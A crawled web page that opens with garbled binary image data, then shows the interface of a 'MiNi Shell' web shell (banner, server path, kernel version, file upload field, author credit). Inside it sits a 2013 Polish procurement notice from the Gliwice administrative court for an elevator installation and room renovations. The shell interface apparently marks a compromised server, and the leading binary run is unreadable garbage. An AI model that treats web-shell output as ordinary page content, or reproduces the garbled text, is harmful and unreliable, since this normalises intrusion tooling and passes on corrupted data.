JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130708/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130708/264858-N-2013.html

<p class="kh_header"><b>Gliwice: Przebudowa pomieszczeń oraz zainstalowanie windy, na który składa się pięć części, tj.: - Cześć 1 - Przebudowa szybu windy i instalacja nowej windy, - Cześć 2 - Przebudowa i zmiana sposobu użytkowania baru na salę szkoleniową z zapleczem socjalnym, bibliotekę i pomieszczenie biurowe, - Cześć 3 - Montaż czterech okien połaciowych na czwartym piętrze budynku, - Cześć 4 - Adaptacja pokoju nr 7 na salę rozpraw z pokojem narad, - Cześć 5 - Modernizacja klimatyzacji w pokojach nr 121 i 225.</b><br>
<b>Numer ogłoszenia: 264858 - 2013; data zamieszczenia: 08.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Sąd Administracyjny w Gliwicach , ul. Prymasa Stefana Wyszyńskiego 2, 44-101 Gliwice, woj. śląskie, tel. 032 2389830, faks 032 2389830 w. 450.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://wsa.gliwice.pl/1/informacje_o_wojewodzkim_sadzie_administracyjnym.html</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa pomieszczeń oraz zainstalowanie windy, na który składa się pięć części, tj.: - Cześć 1 - Przebudowa szybu windy i instalacja nowej windy, - Cześć 2 - Przebudowa i zmiana sposobu użytkowania baru na salę szkoleniową z zapleczem socjalnym, bibliotekę i pomieszczenie biurowe, - Cześć 3 - Montaż czterech okien połaciowych na czwartym piętrze budynku, - Cześć 4 - Adaptacja pokoju nr 7 na salę rozpraw z pokojem narad, - Cześć 5 - Modernizacja klimatyzacji w pokojach nr 121 i 225..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia zawiera dokumentacja projektowa, tj.: 1.Projekt budowlano-wykonawczy przebudowa pomieszczeń Sądu wraz z zainstalowaniem windy - część 1 Przebudowa szybu windy i instalacja nowej windy (zał. 8 do SIWZ), - specyfikacja techniczna wykonania i odbioru robót budowlanych Przebudowa pomieszczeń Sądu - cześć 1 - Przebudowa szybu windy i instalacja nowej windy (zał. 9 do SIWZ), - przedmiar robót - Przebudowa pomieszczeń Sądu wraz z zainstalowaniem windy - część 1 - Przebudowa szybu windy i instalacja nowej windy (zał. 10 do SIWZ). 2.Projekt budowlano-wykonawczy przebudowy pomieszczeń Sądu z zainstalowaniem windy -część 2 - Przebudowa i zmiana sposobu użytkowania baru na salę szkoleniową z zapleczem socjalnym, bibliotekę i pomieszczenie biurowe (zał. 11 do SIWZ), - specyfikacja techniczna wykonania i odbioru robót budowlanych przebudowa pomieszczeń sądu - cześć 2 - Przebudowa i zmiana sposobu użytkowania baru na salę szkoleniową z zapleczem socjalnym, biblioteką i pomieszczenia biurowe (zał. 12 do SIWZ), - przedmiar robót Przebudowa pomieszczeń Sądu wraz z zainstalowaniem windy - cześć 2 - Przebudowa i zmiana sposobu użytkowania baru na salę szkoleniową z zapleczem socjalnym (zał. 13 do SIWZ), - Projekt budowlano-wykonawczy nadproża w piwnicy budynku WSA w Gliwicach (zał. 14 do SIWZ), - specyfikacja techniczna wykonania i odbioru robót budowlanych Przebudowa pomieszczeń Sądu -część 2 -nadproże w piwnicy budynku WSA w Gliwicach (zał. 15 do SIWZ), - przedmiar robót nadproże w piwnicy budynku WSA w Gliwicach (zał. 16 do SIWZ), - Projekt budowlano-wykonawczy przebudowa pomieszczeń Sądu wraz z zainstalowaniem windy cześć 2 Przebudowa i zmiana sposobu użytkowania baru na salę szkoleniową i bibliotekę. Aktualizacja. Wentylacja mechaniczna i klimatyzacja (zał. 17 do SIWZ), - specyfikacja techniczna Przebudowa pomieszczeń Sądu wraz z zainstalowaniem windy - cześć 2 -Przebudowa i zmiana sposobu użytkowania baru na salę szkoleniową i bibliotekę. Aktualizacja ST-01- wentylacja mechaniczna i klimatyzacja (zał. 18 do SIWZ), - Przedmiar robót przebudowa i zmiana sposobu użytkowania baru na salę szkoleniową z zapleczem socjalnym, bibliotekę i pomieszczenie biurowe, wentylacja mechaniczna i klimatyzacja (zał. 19 do SIWZ), - Projekt budowlano-wykonawczy przebudowa pomieszczeń Sądu wraz z zainstalowaniem windy część 2 Przebudowa i zmiana sposobu użytkowania baru na salę szkoleniową i bibliotekę. Aktualizacja. Instalacja centralnego ogrzewania (zał. 20 do SIWZ), - specyfikacja techniczna. Przebudowa pomieszczeń Sądu wraz z zainstalowaniem windy - część 2 - Przebudowa i zmiana sposobu użytkowania baru na salę szkoleniową z zapleczem socjalnym, bibliotekę i pomieszczenia biurowe. ST-02 - Instalacja centralnego ogrzewania (zał. 21 do SIWZ), - przedmiar robót Przebudowa i zmiana sposobu użytkowania baru na salę szkoleniową z zapleczem socjalnym, bibliotekę i pomieszczenia biurowe. Instalacja c.o. (zał. 22 do SIWZ), - Projekt budowlano-wykonawczy. Przebudowa pomieszczeń Sądu wraz z zainstalowaniem windy cześć 2 Przebudowa i zmiana sposobu użytkowania baru na salę szkoleniową z zapleczem socjalnym, bibliotekę (wersja zmodyfikowana) . Instalacja elektryczna, teletechniczna i SSP (zał. 23 do SIWZ), - Specyfikacja techniczna. Przebudowa pomieszczeń Sądu wraz z zainstalowaniem windy cześć 2 Przebudowa i zmiana sposobu użytkowania baru na salę szkoleniową z zapleczem socjalnym, bibliotekę SE-01- Instalacja elektryczna, teletechniczna i SSP (zał. 24 do SIWZ), - Przedmiar robót przebudowa pomieszczeń Sądu wraz z zainstalowaniem windy cześć 2. Przebudowa i zmiana sposobu użytkowania baru na salę szkoleniową z zapleczem socjalnym i biblioteką (Wersja zmodyfikowana). Instalacja elektryczna, teletechniczna i SSP (zał. 25 do SIWZ). 3.Projekt budowlano-wykonawczy Przebudowa pomieszczeń Sądu wraz z zainstalowaniem windy część 3. Montaż czterech okien połaciowych na czwartym piętrze budynku (zał. 26 do SIWZ), - Specyfikacja techniczna wykonania i odbioru robót budowlanych przebudowa pomieszczeń sądu cześć 3. Montaż czterech okien połaciowych na czwartym piętrze budynku (zał. 27 do SIWZ), - Przedmiar robót przebudowa pomieszczeń Sądu wraz z zainstalowaniem windy cześć 3 montaż czterech okien połaciowych na czwartym piętrze budynku (zał. 28 do SIWZ), 4. Projekt budowlano-wykonawczy Przebudowa pomieszczeń Sądu wraz z zainstalowaniem windy - cześć 4 - Adaptacja pokoju nr 7 na Salę rozpraw z pokojem narad (zał. 29 do SIWZ), - Projekt budowlano-wykonawczy nadproża w pomieszczeniu nr 7 budynku WSA w Gliwicach (zał. 30 do SIWZ), - Specyfikacja techniczna wykonania i odbioru robót budowlanych przebudowa pomieszczeń Sądu - część 4 - adaptacja pokoju nr 7 na salę rozpraw z pokojem narad, (zał. 31 do SIWZ), - Przedmiar robót - przebudowa pomieszczeń Sądu część 4 adaptacja pokoju nr 7 na salę rozpraw z pokojem narad. (zał. 32 do SIWZ), - Projekt budowlano-wykonawczy przebudowa pomieszczeń Sądu wraz z zainstalowanie windy - cześć 4 - Adaptacja pokoju nr 7 na Salę Rozpraw z pokojem narad. Wentylacja mechaniczna, klimatyzacja, instalacja c.o. i wod-kan (zał. 33 do SIWZ) - Specyfikacja techniczna przebudowa pomieszczeń Sądu wraz z zainstalowaniem windy część 4 Adaptacja pokoju nr 7 na Sale Rozpraw z pokojem narad ST-01- Wentylacja mechaniczna i klimatyzacja oraz centralne ogrzewanie (zał. 34 do SIWZ), - Przedmiar robót przebudowa pomieszczeń Sądu wraz z zainstalowanie windy cześć 4 Adaptacja pokoju nr 7 na Salę Rozpraw z pokojem narad, Wentylacja mechaniczna i klimatyzacja oraz centralne ogrzewanie (zał. 35 do SIWZ), - Projekt budowlano-wykonawczy przebudowa pomieszczeń Sądu z zainstalowaniem windy cześć 4 Adaptacja pokoju nr 7 na Salę Rozpraw z pokojem narad (Wersja zmodyfikowana). Instalacja elektryczna, teletechniczna i SSP (zał.36 do SIWZ), - Specyfikacja techniczna SE przebudowa pomieszczeń Sądu wraz z zainstalowaniem windy cześć 4. Adaptacja pokoju nr 7 na Salę Rozpraw z pokojem narad. 01 Instalacja elektryczna, teletechniczna i SSP (zał. 37 do SIWZ), - Przedmiar robót przebudowa pomieszczeń Sądu wraz z zainstalowaniem windy cześć 4. Adaptacja pokoju nr 7 na Salę Rozpraw z pokojem narad. Instalacja elektryczna, teletechniczna i SSP (zał. 38 do SIWZ). 5. Projekt budowlano-wykonawczy przebudowa pomieszczeń Sądu wraz z zainstalowaniem windy cześć 5 Modernizacja klimatyzacji w pokojach nr 121, 225. Aktualizacja. Klimatyzacja (zał. 39 do SIWZ), - Specyfikacja techniczna przebudowa pomieszczeń Sądu wraz z zainstalowaniem windy cześć 5 Modernizacja klimatyzacji w pokojach nr 121, 225. Aktualizacja. Specyfikacja techniczna ST-01 Klimatyzacja (zał. 40 do SIWZ), - Przedmiar robót przebudowa pomieszczeń Sądu wraz z zainstalowaniem windy cześć 5 Modernizacja klimatyzacji w pokojach nr 121, 225. (zał. 41 do SIWZ), - Projekt budowlano-wykonawczy przebudowa pomieszczeń Sądu wraz z zainstalowaniem windy cześć 5 Modernizacja klimatyzacji w pokojach nr 121. (wersja zmodyfikowana). Instalacja elektryczna (zał. 42 do SIWZ), - Specyfikacja techniczna przebudowa pomieszczeń Sądu wraz z zainstalowaniem windy cześć 5 Modernizacja klimatyzacji w pokojach nr 121,. SE -01- Instalacja elektryczna (zał. 43 do SIWZ), - Przedmiar robót przebudowa pomieszczeń Sądu wraz z zainstalowaniem windy cześć 5 Modernizacja klimatyzacji w pokojach nr 121, Instalacja elektryczna (zał. 44 do SIWZ).</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zgodnie z art 67 ust. 1 pkt. 6 ustawy</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.61.12-2, 45.31.31.00-5, 45.45.30.00-7, 45.45.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 130.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga złożenia wadium w wysokości 10 000 PLN (słownie dziesięć tysięcy złotych) Wadium należy wnieść przed terminem składania ofert. Wadium może być wnoszone w jednej lub kilku następujących formach: 1) pieniądzu; 2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym; 3) gwarancjach bankowych; 4) gwarancjach ubezpieczeniowych; 5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275 z 2008 r. Nr 116, poz. 730 i 732 i Nr 227, poz. 1505 oraz z 2010 r. Nr 96, poz. 620).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca składa oświadczenie (zał. nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca powinien wykazać się należytym wykonaniem w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzanie działalności jest krótszy w tym okresie, co najmniej dwóch robót odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia i o wartości każdej z nich nie mniejszej niż 400 000 zł z podaniem daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty zostały wykonane zgodnie z wiedza techniczną i prawidłowo ukończone (zał. nr 5 do SIWZ). Wykonawca musi wykazać, że w ramach przedstawionych robót wykonywał prace ogólnobudowlane oraz instalacyjne w dowolnych branżach</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca składa oświadczenie (zał. nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca do realizacji przedmiotu zamówienia powinien wykazać po jednej osobie posiadającej uprawnienia budowlane do kierowania robotami budowlanymi, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń, instalacji urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych (zał. nr 4 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>celu potwierdzenia odpowiedniej sytuacji ekonomicznej i finansowej (art. 22 ust. 1 pkt. 4 ustawy) Wykonawca powinien wykazać, że jest ubezpieczony od odpowiedzialności cywilnej za szkody rzeczowe i osobowe wyrządzone osobie trzeciej w zakresie prowadzonej działalności gospodarczej na kwotę minimum 400 000 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>



<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://wsa.gliwice.pl/1/informacje_o_wojewodzkim_sadzie_administracyjnym.html<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Sąd Administracyjny w Gliwicach ul. Prymasa Stefana Wyszyńskiego 2 44-101 Gliwice pokój nr 410.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.07.2013 godzina 11:00, miejsce: Wojewódzki Sąd Administracyjny w Gliwicach ul. Prymasa Stefana Wyszyńskiego 2 44-101 Gliwice pokój nr 20.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com